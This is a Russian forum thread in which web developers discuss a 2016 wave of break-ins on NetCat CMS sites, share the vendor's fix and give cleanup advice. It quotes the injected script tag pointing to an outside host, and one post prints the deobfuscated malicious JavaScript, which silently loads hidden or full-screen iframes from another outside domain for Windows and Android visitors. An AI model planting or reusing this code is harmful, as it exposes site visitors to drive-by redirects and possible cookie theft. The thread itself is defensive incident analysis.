|
|
29.04.2016, 10:36
|
|
serguesqx
Клевер АС
Зарегистрирован:
2012-11-26
Сообщений: 19
|
Со вчерашнего дня пошли взломы сайтов на котах версий 5.0/5.2/5.3, внедряют в файл /netcat/require/e404.php такой скрипт:
Код:<script src=http://webshop-tool-manager.info/statistic/googleapis.js></script>
Завирусили уже 6 сайтов, на всех есть формы с капчей.
Народ есть мысли, может сталкивался кто?
О, приветик.
|
|
|
29.04.2016, 11:38
|
|
serguesqx
Клевер АС
Зарегистрирован:
2012-11-26
Сообщений: 19
|
Саппорт ответил, уезвимость закрывается так https://docs.google.com/document/d/1LCI2H5OuDhyK6KATYyjDsDA7mtVXRlBQRe5r4N76DtM/edit
О, приветик.
|
|
|
03.05.2016, 15:07
|
|
Руслан Густокашин
Студия Вэлпис
Зарегистрирован:
2012-02-06
Сообщений: 962
|
Практически все более старые версии, кстати, тоже пострадали. Я расписал дополнительно подробно об уязвимости, на всякий случай почитайте.
|
|
|
04.05.2016, 11:54
|
|
Pavel
Зарегистрирован:
2007-10-20
Сообщений: 55
|
а что делает скрипт http://webshop-tool-manager.info/statistic/googleapis.js - кто-то знает? Что-то надо посоветовать тем, кто зашел на сайт во время заражения?
спасибо за инструкцию!!!
|
|
|
04.05.2016, 12:07
|
|
Руслан Густокашин
Студия Вэлпис
Зарегистрирован:
2012-02-06
Сообщений: 962
|
Да непонятно. Мы раскодировали его, но ничего толком не поняли.
С куками что-то творит, возможно ворует их (чтобы авторизовываться потом без пароля в админке).
По айфреймам, которые генерит этот скрипт, не удалось разобраться, что они делают - перекидывает на yahoo.
Рекомендую сделать в SQL-консоли truncate table Session (чтобы перестали действовать все старые сохраненные сеансы работы) и после этого поменять пароль всем админам пароли в админке.
MySQL'ный пароль вряд ли стащили, но тоже для безопасности лучше поменять.
А вот на FTP и на панель хостинга пароли менять бессмысленно - их своровать через эту дырку технически невозможно.
|
|
|
04.05.2016, 13:03
|
|
Руслан Густокашин
Студия Вэлпис
Зарегистрирован:
2012-02-06
Сообщений: 962
|
Вот, кстати, этот скрипт в раскодированном виде. Может кто чего поймет.
Код:
function check_os() {
var _0x890dx2 = navigator['userAgent']['toLowerCase']();
if ((_0x890dx2['indexOf']('windows') !== -1) && (_0x890dx2['indexOf']('safari') == -1)) {
return 'win'
} else {
if (_0x890dx2['indexOf']('android') !== -1) {
return 'android'
}
}
}
function getCookie(_0x890dx4) {
var _0x890dx5 = document['cookie']['match'](new RegExp('(?:^|; )' + _0x890dx4['replace'](/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\$1') + '=([^;]*)'));
return _0x890dx5 ? decodeURIComponent(_0x890dx5[1]) : undefined
}
result = check_os();
cook = null;
cook = getCookie('googlewebmapi6');
if (cook == null || cook == 'NaN1') {
if (result == 'win' || result == 'android') {
if (result == 'win') {
var div = document['createElement']('div');
div['style']['position'] = 'absolute';
div['style']['left'] = '-3000px';
div['style']['top'] = '-1000px';
div['innerHTML'] = '<iframe src=\'http://pestcontrolfinder.net.au/?PKqBx3\' width=\'0\' height=\'0\'>';
document['body']['appendChild'](div)
} else {
if (result == 'android') {
var div = document['createElement']('div');
div['style']['position'] = 'absolute';
div['style']['left'] = '0px';
div['style']['top'] = '0px';
win_w = document['body']['clientWidth'];
win_h = document['body']['clientHeight'];
div['innerHTML'] = '<iframe src=\'http://pestcontrolfinder.net.au/?sKT8dW\' width=' + win_w + ' height=' + win_h + '>';
document['body']['appendChild'](div)
}
}
}
};
if (cook != 'NaN1111') {
cook = cook + 1;
document['cookie'] = 'googlewebmapi6=' + cook
}
|
